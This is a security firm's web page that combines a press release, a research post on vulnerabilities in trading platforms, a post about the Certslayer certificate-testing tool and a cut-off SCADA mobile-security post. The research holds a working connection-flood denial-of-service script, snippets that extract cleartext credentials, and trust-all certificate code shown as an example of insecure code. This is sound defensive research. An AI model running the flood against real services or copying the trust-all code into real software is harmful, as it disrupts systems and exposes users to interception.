IOActive Expands Secure Development Lifecycle Services with Continuous Penetration Testing
New Service Model Designed to Enable Enterprise DevSecOps to Build a Robust Secure Development Lifecycle
Seattle, WA – May 21, 2020 – IOActive, Inc., the worldwide leader in research-fueled security services, today announced the introduction of its new Continuous Penetration Testing (CPT) services. This new style of testing is designed to address the challenge of integrating security testing into an agile development model. While many organizations have moved to Continuous Integration and Continuous Deployment (CI/CD) processes, independent validation and verification has not aligned with that enhanced agility, until now.
“As enterprises have embraced agile development over waterfall, they have struggled to integrate security testing throughout the process. Time and time again it has been proven that weaving security throughout the development cycle produces stronger products and costs less in the end. To be effective, penetration testing models have to evolve to better align with how enterprises approach development, deployment, and operations,” said John Sheehy, SVP of Research and Strategy at IOActive. “We’ve worked closely with our enterprise customers to refine this model to deliver the ongoing support they need to build highly secure products in an agile model.”
Understanding that ongoing testing is critical in secure product development – just as agile focuses on small sprints and changes – CPT focuses on those associated code, network, infrastructure, application, and configuration changes early, before or shortly after they go to production. The flexibility of these services is designed to provide ongoing, cost-effective testing of components as they are developed, resulting in more robust and secure products. These new services are an extension of IOActive’s suite of Secure Development Lifecycle services, which include full-stack penetration testing and threat modeling, design and architecture reviews, as well as program development and management. The CPT offering is best utilized on certain parts of the technology stack, such as externally accessible web applications, mobile applications, web services, and network and IT infrastructure.
This announcement complements IOActive’s recent Pen-testing Protection Program, designed to help global small businesses continue the penetration testing necessary to support cybersecurity risk management as they deal with the financial impacts of the stay-at-home orders imposed to keep their communities safe. The new CPT offering is designed to support larger organizations by providing flexible penetration testing services aligned with the CI/CD model favored by DevOps teams, while providing for the cybersecurity risk management needed by the SecDevOps team. When properly employed, CPT allows organizations to engage in effective expense management as well as enhance the cadence and agility of external penetration testing.
“Many organizations are currently facing the existential threat of a prolonged pandemic-compromised economy. Unfortunately, this is a reminder that often it’s the unexpected threats that can be the most impactful, and as organizations face the daunting task of keeping business going, we want to add new services and flexible programs to help our customers stay viable and secure. CI/CD/CPT provides organizations with an integrated agile approach consisting of agile development along with an agile, independent assessment of cybersecurity risk,” Sheehy said.
As part of IOActive’s mission to make the world a safer and more secure place, new infrastructure and tools were developed and deployed to ensure the entire suite of services can be delivered remotely to allow customers to keep their teams healthier at home as long as deemed necessary.
About IOActive
IOActive is a trusted partner for Global 1000 enterprises, providing research-fueled security services across all industries. Our cutting-edge security teams provide highly specialized technical and programmatic services including full-stack penetration testing, program efficacy assessments, and hardware hacking. IOActive brings a unique attacker’s perspective to every client engagement to maximize security investments and improve clients’ overall security posture and business resiliency. Founded in 1998, IOActive is headquartered in Seattle with global operations. For more information, visit ioactive.com.
RESEARCH | August 7, 2018
Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies
By
Alejandro Hernandez
This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details of the research.
Disclaimer
Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.
This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.
Introduction
The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
The valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.
Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Send buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.
Scope
My analysis started in mid-2017 and concluded in July 2018. It encompassed the following platforms, many of which are among the most widely used and well-known trading platforms; some allow cryptocurrency trading:
16 Desktop applications
34 Mobile apps
30 Websites
These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer all three types of platforms; however, in some cases only one or two were reviewed due to certain limitations:
Ally Financial
AvaTrade
Binance
Bitfinex
Bitso
Bittrex
Bloomberg
Capital One
Charles Schwab
Coinbase
easyMarkets
eSignal
ETNA
eToro
E-TRADE
ETX Capital
ExpertOption
Fidelity
Firstrade
FxPro
GBMhomebroker
Grupo BMV
IC Markets
Interactive Brokers
IQ Option
Kraken
Markets.com
Merrill Edge
MetaTrader
Net
NinjaTrader
OANDA
Personal Capital
Plus500
Poloniex
Robinhood
Scottrade
TD Ameritrade
TradeStation
Yahoo! Finance
Devices used:
Windows 7 (64-bit)
Windows 10 Home Single (64-bit)
iOS 10.3.3 (iPhone 6) [not jailbroken]
iOS 10.4 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
The basic security controls/features reviewed represent just the tip of the iceberg compared to more exhaustive lists of security checks per platform.
Results
Unfortunately, the results proved to be much worse than those for applications in retail banking. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.
Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.
While testing, I noted a basic correlation: the biggest brokers are the ones that invest the most in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.
Based on my testing results and opinion, the following trading platforms are the most secure:
Broker
Platforms
TD Ameritrade
Web and mobile
Charles Schwab
Web and mobile
Merrill Edge
Web and mobile
MetaTrader 4/5
Desktop and mobile
Yahoo! Finance
Web and mobile
Robinhood
Web and mobile
Bloomberg
Mobile
TradeStation
Mobile
Capital One
Mobile
FxPro cTrader
Desktop
IC Markets cTrader
Desktop
Ally Financial
Web
Personal Capital
Web
Bitfinex
Web and mobile
Coinbase
Web and mobile
Bitso
Web and mobile
The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, denial of service, authentication, and/or session management. Despite the fact that these platforms implement good security features, they also have areas that should be addressed to improve their security.
The following are the platforms I consider must improve in terms of security:
Broker
Platforms
Interactive Brokers
Desktop, web and mobile
IQ Option
Desktop, web and mobile
AvaTrade
Desktop and mobile
E-TRADE
Web and mobile
eSignal
Desktop
TD Ameritrade’s Thinkorswim
Desktop
Charles Schwab
Desktop
TradeStation
Desktop
NinjaTrader
Desktop
Fidelity
Web
Firstrade
Web
Plus500
Web
Markets.com
Mobile
Unencrypted Communications
In 9 desktop applications (64%) and 2 mobile apps (6%), unencrypted transmission of data was observed. Most applications transmit most of the sensitive data in an encrypted way; however, there were some cases where cleartext data could be seen in unencrypted requests.
Among the data seen unencrypted were passwords, balances, portfolios, personal information, and other trading-related data. In most cases of unencrypted transmission, plaintext HTTP was seen; in others, old proprietary protocols or other financial protocols such as FIX were used.
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
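To illustrate how little effort recovering data from such traffic takes, the sketch below parses credentials straight out of a cleartext HTTP login request. The request and its field names are hypothetical, not taken from any specific platform:

```python
def extract_credentials(raw_http: bytes):
    """Pull login fields out of a captured plaintext HTTP request.
    No cryptography is needed: only string parsing.
    (URL-decoding is omitted for brevity.)"""
    # The body follows the blank line that ends the headers
    body = raw_http.split(b"\r\n\r\n", 1)[-1].decode()
    fields = dict(pair.split("=", 1) for pair in body.split("&") if "=" in pair)
    return fields.get("username"), fields.get("password")

# Hypothetical capture from an unencrypted login:
req = (b"POST /login HTTP/1.1\r\n"
       b"Host: broker.example\r\n"
       b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
       b"username=alice&password=hunter2")
print(extract_credentials(req))  # ('alice', 'hunter2')
```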
For example, the following application uses unencrypted HTTP. The screenshot shows a buy order:
Another interesting example was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data. During the testing, it was noted that Data Manager authenticates over an unencrypted protocol on the TCP port 2189, apparently developed in 1999.
As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.
The main eSignal login screen also authenticates through a cleartext channel:
FIX is a protocol initiated in 1992 and is one of the industry standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it through a secure channel, however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.
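To sketch why cleartext FIX is risky: messages are plain tag=value pairs separated by the SOH byte (0x01), readable and modifiable by anyone on the path. The message below is an illustrative New Order Single (35=D), not captured traffic:

```python
SOH = "\x01"  # FIX field delimiter

def parse_fix(msg: str) -> dict:
    """Split a cleartext FIX message into its tag=value fields."""
    return dict(f.split("=", 1) for f in msg.strip(SOH).split(SOH))

# Illustrative order: 35=D (New Order Single), 55=Symbol, 54=Side, 38=Qty
order = "8=FIX.4.2\x0135=D\x0155=AAPL\x0154=1\x0138=100\x01"
fields = parse_fix(order)
print(fields["55"], fields["38"])  # AAPL 100
```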
A broker that supports FIX:
There are some cases where the application encrypts the communication channel, except in certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all the communication, but not that used by iBot, the robot assistant that receives text or voice commands, which sends the instructions to the server embedded in a FIX protocol message in cleartext:
News related to the positions were also observed in plaintext:
Another instance of an application that uses encryption but not for certain channels is Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server on a scheduled basis through unencrypted HTTP:
A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.
Others appear to implement their own binary protocols, such as Charles Schwab, however, symbols in watchlists or quoted symbols could be seen in cleartext:
Interactive Brokers supports encryption but by default uses an insecure channel; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and some sensitive data will be sent and received without encryption:
Passwords Stored Unencrypted
In 7 mobile apps (21%) and in 3 desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract them, though. This access could be either physical or through malware.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easy), log in through the web-based trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (+75%) support two-factor authentication (2FA); however, it’s not enabled by default, and the user must go to the configuration and enable it to receive authorization codes by text message or email. Hence, if 2FA is not enabled on the account, it’s possible for an attacker who already knows the password to link a new bank account and withdraw the money from sold securities.
The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:
Base64 is not encryption:
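Reversing such an encoded value takes a single standard-library call, with no key involved (the password below is a made-up example):

```python
import base64

# Base64 is a reversible encoding, not encryption: no secret is needed.
stored = base64.b64encode(b"S3cretPass!").decode()
print(stored)                         # UzNjcmV0UGFzcyE=
recovered = base64.b64decode(stored)  # one call recovers the plaintext
print(recovered)                      # b'S3cretPass!'
```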
In some cases, the password was sent to the server as a GET parameter, which is also insecure:
One PIN for login and unlocking the app was also seen:
In IQ Option, the password was stored completely unencrypted:
However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:
Trading and Account Information Stored Unencrypted
In the trading context, operational or strategic data must not be stored unencrypted nor sent to any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though. This access could be either physical or through malware.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
The following screenshots show applications that store sensitive data unencrypted:
Balances:
Investment portfolio:
Buy/sell orders:
Watchlists:
Recently quoted symbols:
Other data:
Trading Programming Languages with DLL Import Capabilities
This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.
The following are a few of the trading platforms with their own trading language:
MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
AvaTraceAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
(FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)
Nevertheless, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to only execute plugins from trusted sources. However, there are Internet tutorials claiming to “make you rich overnight” with certain trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox to allow DLL imports. Innocent, non-tech-savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.
The following is a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:
Another basic example is NinjaTrader, which simply allows OS commands through C#’s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe is executed from the chart initialization routine:
Denial of Service
Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connections handling of such services.
A common error is not implementing a limit on the number of concurrent connections. If there is no limit on concurrent connections to a TCP daemon, applications are susceptible to denial-of-service (DoS) or other types of attacks, depending on the nature of the application.
For example, TD Ameritrade’s Thinkorswim TCP-Orders Server listens on the TCP port 2000 in the localhost interface, and there is no limit for connections nor a waiting time between orders. This leads to the following problems:
Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
A NULL pointer dereference is triggered and an error report (.zip file) is created.
It listens on the local interface only; regardless, there are ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.
Memory leakage could be easily triggered by creating as many connections as possible:
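A minimal sketch of such a connection flood follows. The host, port, and count are illustrative (Thinkorswim’s order server listened on localhost port 2000); against a daemon with no concurrency limit, each held-open connection pins resources on the server side:

```python
import socket

def flood_connections(host: str, port: int, count: int):
    """Open `count` TCP connections and keep them all alive.
    If the server never frees per-connection resources, memory
    usage grows with every socket held open."""
    conns = []
    for _ in range(count):
        conns.append(socket.create_connection((host, port), timeout=2))
    return conns

# Hypothetical usage against the local order server described above:
# conns = flood_connections("127.0.0.1", 2000, 10_000)
```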
A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data; therefore, availability is the most important asset:
It’s recommended to implement a configuration item to allow the user to control the behavior of the TCP order server, such as controlling the maximum number of orders sent per minute as well as the number of seconds to wait between orders to avoid bottlenecks.
The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:
Session Still Valid After Logout
Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.
In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:
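One way to check this behavior is to replay an authenticated request with the old token after logging out. A minimal sketch follows; the URL, cookie name, and the simplification that HTTP 200 means "still valid" are all hypothetical:

```python
import urllib.request
import urllib.error

def session_still_valid(url: str, session_cookie: str) -> bool:
    """Replay an authenticated request after logout. A secure backend
    rejects the stale token (e.g. 401); a 200 with account data means
    the server never invalidated the session."""
    req = urllib.request.Request(url, headers={"Cookie": session_cookie})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False

# Hypothetical usage after pressing the logout button:
# session_still_valid("https://broker.example/account", "JSESSIONID=abc123")
```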
Authentication
While most web-based trading platforms support 2FA (+75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Weak Password Policies
Some institutions let the users choose easily guessable passwords. For example:
The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.
In some cases, such as IQ Option and Markets.com, the password policy validation is implemented on the client side only; hence, it is possible to intercept a request and send a weak password to the server:
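Repeating the policy check server-side is a few lines of code. A minimal sketch (the thresholds are illustrative, not rules drawn from the research):

```python
def password_is_strong(pw: str) -> bool:
    """Server-side policy check: minimum length, mixed case, and a
    digit. Runs regardless of what the client-side validation did."""
    return all([
        len(pw) >= 8,
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
    ])

print(password_is_strong("123456"))       # False: too short, no letters
print(password_is_strong("Str0ngPassw"))  # True
```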
Automatic Logout/Lockout for Idle Sessions
Most web-based platforms logout/lockout the user automatically, but this is not the case for desktop (43%) and mobile apps (25%). This is a security control that forces the user to authenticate again after a period of idle time.
Privacy Mode
This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.
The following images show before and after enabling privacy mode in Thinkorswim for mobile:
Hardcoded Secrets in Code and App Obfuscation
16 Android .apk installers (47%) were easily reverse engineered to human-readable code since they lack obfuscation. Most Java and .NET-based desktop applications were also reverse engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.
The goal of obfuscation is to conceal the application’s purpose and logic (security through obscurity) in order to deter reverse engineering by making it more difficult.
In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) contain traces (hostnames and IPs) of the internal development and testing environments where they were made or tested. Some of these hostnames are reachable from the Internet, and since they are testing systems, they could lack proper protections.
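Finding such secrets and leftovers after decompilation is essentially pattern matching. An illustrative scan follows; the patterns are hypothetical and far from exhaustive:

```python
import re

# Illustrative rule only; real secret scanners ship large rule sets
SECRET_PATTERN = re.compile(
    r"(?i)(api[_-]?key|password|secret)\w*\s*[=:]\s*[\"']([^\"']+)[\"']")

def find_hardcoded_secrets(source: str):
    """Grep-style scan of decompiled source for credential-looking
    assignments; returns (label, value) pairs."""
    return [(m.group(1), m.group(2)) for m in SECRET_PATTERN.finditer(source)]

# Hypothetical decompiled Java line:
src = 'private static final String morningstarPassword = "p@ss123";'
print(find_hardcoded_secrets(src))  # [('Password', 'p@ss123')]
```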
SSL Certificate Validation
11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on their phone, though.
The apps that do verify the certificate normally refuse to transmit any data over an untrusted connection; however, only Charles Schwab lets the user decide whether to continue using the app with the certificate provided:
Lack of Anti-exploitation Mitigations
ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack canaries are used to identify whether the stack has been corrupted. These security features make it much more difficult for memory corruption bugs to be exploited to execute arbitrary code.
The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, these features are enabled only in some components, not the entire application. In other cases, components that handle network connections also lack these flags.
Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.
Other Weaknesses
More issues were found in the platforms. For more details, please refer to the white paper.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
For more statistics, please refer to the white paper.
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017, we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher-risk vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.
As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.
TD Ameritrade and Charles Schwab were the brokers that communicated most with IOActive about resolving the reported issues.
For a table with the current status of the responsible disclosure process, please refer to the white paper.
Conclusions and Recommendations
Trading platforms are less secure than the applications seen in retail banking.
There’s still a long way to go to improve the maturity level of security in trading technologies.
End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
Brokerage firms should also offer security guidance in their online education centers.
Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Rating organizations should include security in their reviews.
Side Note
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
tl;dr: Certslayer allows testing of how an application handles SSL certificates and whether or not it is verifying relevant details on them to prevent MiTM attacks: https://github.com/n3k/CertSlayer.
During application source code reviews, we often find that developers forget to enable all the security checks done over SSL certificates before going to production. Certificate-based authentication is one of the foundations of SSL/TLS, and its purpose is to ensure that a client is communicating with a legitimate server. Thus, if the application isn’t strictly verifying all the relevant details of the certificate presented by a server, it is susceptible to eavesdropping and tampering from any attacker having a suitable position in the network.

The following Java code block nullifies all the certificate verification checks:
// WARNING: this TrustManager accepts ANY certificate chain,
// silently disabling all server authentication
X509TrustManager trustAll = new X509TrustManager() {
    public void checkClientTrusted(X509Certificate[] chain, String authType)
            throws CertificateException { }  // never throws: every client trusted

    public void checkServerTrusted(X509Certificate[] chain, String authType)
            throws CertificateException { }  // never throws: every server trusted

    public X509Certificate[] getAcceptedIssuers() {
        return null;
    }
};
Similarly, the following python code using urllib2 disables SSL verification:
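In Python 3 terms (urllib2 is the Python 2 ancestor of urllib.request, and behaves analogously), disabling verification boils down to one unverified context:

```python
import ssl
import urllib.request  # urllib2 in Python 2

# An unverified context skips both chain validation and hostname checks,
# so any certificate (self-signed, expired, wrong CN) is accepted.
ctx = ssl._create_unverified_context()
print(ctx.verify_mode == ssl.CERT_NONE)  # True
print(ctx.check_hostname)                # False

# Any request made with this context trusts whoever answers:
# urllib.request.urlopen("https://example.com/", context=ctx)
```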
These issues are not hard to spot while reading code, but what about a complete black box approach? Here is where Certslayer comes to the rescue.
How does it work?
Proxy Mode
Certslayer starts a proxy server and monitors for specified domains. Whenever a client makes a request to a targeted domain, the proxy redirects the request to an internal web server, presenting a special certificate as a test-case. If the internal web server receives the request, it means the client accepted the test certificate, and the connection was successful at the TLS level. On the other hand, if the internal web server doesn’t receive a request, it means the client rejected the presented certificate and aborted the connection.
For testing mobile applications, the proxy mode is very useful. All a tester needs to do is install the certificate authority (Certslayer CA) on the phone as trusted and configure the system proxy before running the tool. Simply using the application generates requests to its backend servers, which are trapped by the proxy monitor and redirected accordingly to the internal web server. This approach also reveals whether any sort of certificate pinning is in place, as the request will not succeed even when a valid certificate signed by the CA is presented.
A simple way to test in this mode is to configure the browser proxy and navigate to a target domain. For example, the next command will start the proxy mode on port 9090 and will monitor requests to www.ioactive.com:
The error code explains the problem: SEC_ERROR_BAD_SIGNATURE, which matches the first test-case in the list. At this point, Certslayer has already prepared the next test-case in the list. By reloading the page with F5, we get the next result.
At the end, a CSV file is generated containing the results of each test case. The following table summarizes them for this example:
Stand-alone Mode
Proxy mode is not useful when testing a web application or web service that allows fetching resources from a specified endpoint. In most instances, there won’t be a way to install a root CA at the application backend for doing these tests. However, there are applications that include this feature in their design, such as cloud applications that allow interacting with third-party services.
In these scenarios, besides checking for SSRF vulnerabilities, we also need to check if the requester is actually verifying the presented certificate. We do this using Certslayer standalone mode. Standalone mode binds a web server configured with a test-certificate to all network interfaces and waits for connections.
I recently tested a cloud application that allowed installing a root CA to enable interaction with custom SOAP services served over HTTPS. Using the standalone mode, I found the library in use wasn’t correctly checking the certificate common name (CN). To run the test-suite, I registered a temporary DNS name (http://ipq.co/) to my public IP address and ran Certslayer with the following command:
+ Setting up WebServer with Test: Trusted CA Invalid Signature
>> Hit enter for setting the next TestCase
The command initialized standalone mode listening on port 4444. The test certificates then used j22d1i.ipq.co as the CN. After this, I instructed the application to perform the request to my server:
{"status":500,"title":"Problem accessing WSDL description","detail":"We couldn't open a connection to the service (Describe URL: https://j22d1i.ipq.co:4444/). Reason: Signature does not match. Check the availability of the service and try again"}
The connection was refused. The server error described the reason why: the CA signature didn’t match. Hitting enter in the python console made the tool prepare the next test case:
+ Killing previous server
j22d1i.ipq.co,Trusted CA Invalid Signature,Certificate Rejected,Certificate Rejected
+ Setting up WebServer with Test: Signed with CertSlayer CA
>> Hit enter for setting the next TestCase
Here, the connection succeeded because the tool presented a valid certificate signed with Certslayer CA:
Server Response:
{"status":500,"detail": "We couldn't process the WSDL https://j22d1i.ipq.co:4444/. Verify the validity of the WSDL file and that it's available in the specified location."}
Certslayer output:
j22d1i.ipq.co,Signed with CertSlayer CA,Certificate Accepted,Certificate Accepted
When the web server is configured with a certificate with a wrong CN, the expected result is that the client will abort the connection. However, this particular application accepted the certificate anyway:
+ Setting up WebServer with Test: Wrong CNAME
As before, a CSV file was generated containing all the test cases with the actual and expected results. For this particular engagement, the result was:
A similar tool, tslpretense, takes a different approach: instead of using a proxy to intercept requests to targeted domains, it requires configuring the test runner as a gateway so that all traffic the client generates passes through it. Configuring a gateway host this way is tedious, which is the primary reason Certslayer was created.
SCADA and Mobile Security in the Internet of Things Era
By
Alexander Bolshev and Ivan Yushkevich
Two years ago, we assessed 20 mobile applications that worked with ICS software and hardware. At that time, mobile technologies were widespread, but Internet of Things (IoT) mania was only starting. Our research concluded the combination of SCADA systems and mobile applications had the potential to be a very dangerous and vulnerable cocktail. In the introduction of our paper, we stated "convenience often wins over security. Nowadays, you can monitor (or even control!) your ICS from a brand-new Android [device]."
Today, no one is surprised by the Industrial Internet of Things (IIoT). The idea of putting your logging, monitoring, and even supervisory/control functions in the cloud does not sound as crazy as it did several years ago. If you look at mobile application offerings today, many more ICS-related applications are available than two years ago. Previously, we predicted that the "rapidly growing mobile development environment" would redeem the past sins of SCADA systems. The purpose of our research is to understand how the landscape has evolved and assess the security posture of SCADA systems and mobile applications in this new IIoT era.
SCADA and Mobile Applications
ICS infrastructures are heterogeneous by nature. They include several layers, each of which is dedicated to specific tasks. Figure 1 illustrates a typical ICS structure.
Figure 1: Modern ICS infrastructure including mobile apps
Mobile applications reside in several ICS segments and can be grouped into two general families: Local (control room) and Remote.
Local Applications
Local applications are installed on devices that connect directly to ICS devices in the field or process layers (over Wi-Fi, Bluetooth, or serial).
Remote Applications
Remote applications allow engineers to connect to ICS servers using remote channels, like the Internet, VPN-over-Internet, and private cell networks. Typically, they only allow monitoring of the industrial process; however, several applications allow the user to control/supervise the process. Applications of this type include remote SCADA clients, MES clients, and remote alert applications. In comparison to local applications belonging to the control room group, which usually operate in an isolated environment, remote applications are often installed on smartphones that use Internet connections or even on personal devices in organizations that have a BYOD policy. In other words, remote applications are more exposed and face different threats. We considered the following threat types:
Unauthorized physical access to the device or “virtual” access to device data
Communication channel compromise (MiTM)
Application compromise
Table 1 summarizes the threat types.
Table 1: SCADA mobile client threat list
Attack Types
Based on the threats listed above, attacks targeting mobile SCADA applications can be sorted into two groups.
Directly/indirectly influencing an industrial process or industrial network infrastructure
This type of attack could be carried out by sending data that would be carried over to the field segment devices. Various methods could be used to achieve this, including bypassing ACL/permissions checks, accessing credentials with the required privileges, or bypassing data validation.
Compromising a SCADA operator to unwillingly perform a harmful action on the system
The core idea is for the attacker to create environmental circumstances where a SCADA system operator could make incorrect decisions and trigger alarms or otherwise bring the system into a halt state.
Testing Approach
Similar to the research we conducted two years ago, our analysis and testing approach was based on the OWASP Mobile Top 10 2016. Each application was tested using the following steps:
Perform analysis and fill out the test checklist
Perform client and backend fuzzing
If needed, perform deep analysis with reverse engineering
We did not alter the fuzzing approach since the last iteration of this research. It was discussed in depth in our previous whitepaper, so its description is omitted for brevity.
We improved our test checklist for this assessment. It includes:
Application purpose, type, category, and basic information
Permissions
Password protection
Application intents, exported providers, broadcast services, etc.
Native code
Code obfuscation
Presence of web-based components
Methods of authentication used to communicate with the backend
Correctness of operations with sessions, cookies, and tokens
SSL/TLS connection configuration
XML parser configuration
Backend APIs
Sensitive data handling
HMI project data handling
Secure storage
Other issues
Reviewed Vendors
We analyzed 34 vendors in our research, randomly selecting SCADA application samples from the Google Play Store. We did, however, favor applications for which we were granted access to the backend hardware or software, so that a wider attack surface could be tested.
Additionally, we excluded applications whose most recent update was before June 2015, since they were likely the subject of our previous work. We only retested them if there had been an update during the subsequent two years.
Findings
We identified 147 security issues in the applications and their backends. We classified each issue according to the OWASP Top Ten Mobile risks and added one additional category for backend software bugs.
Table 4 presents the distribution of findings across categories. The "Number of Issues" column reports the number of issues belonging to each category, while the "% of Apps" column reports the percentage of applications with at least one vulnerability in that category.
Table 4. Vulnerabilities statistics
In our white paper, we provide an in-depth analysis of each category, along with examples of the most significant vulnerabilities we identified. Please download the white paper for a deeper analysis of each of the OWASP category findings.
Remediation And Best Practices
In addition to the well-known recommendations covering the OWASP Top 10 and OWASP Mobile Top 10 2016 risks, there are several actions that developers of mobile SCADA clients can take to further protect their applications and systems. The following list gathers the most important items to consider when developing a mobile SCADA application:
